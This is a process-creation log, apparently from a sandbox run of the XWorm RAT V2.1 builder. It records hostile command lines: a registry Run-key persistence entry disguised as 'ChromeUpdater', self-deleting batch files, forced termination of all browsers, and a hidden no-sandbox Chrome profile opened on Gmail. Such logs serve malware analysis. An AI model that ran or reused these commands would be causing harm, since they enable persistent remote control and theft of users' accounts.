C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3332 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2976 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4620 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 1908"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2132"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM brave.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM firefox.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM opera.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1556 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3216 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4560 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5176 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1564 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" " https://mail.google.com" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1720 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1920 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1984 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --first-renderer-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2672 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2700 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4080 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4200 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4244 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4588 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4600 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4616 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Guna.UI2.dll"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C5312488AE7951256FD535A170B923D --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=15B5A64AE6FE350026D67382BD5E688A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=15B5A64AE6FE350026D67382BD5E688A --renderer-client-id=2 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D38B3C5BF85A9F763E2E1F34D1422946 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9986b3cb8,0x7ff9986b3cc8,0x7ff9986b3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
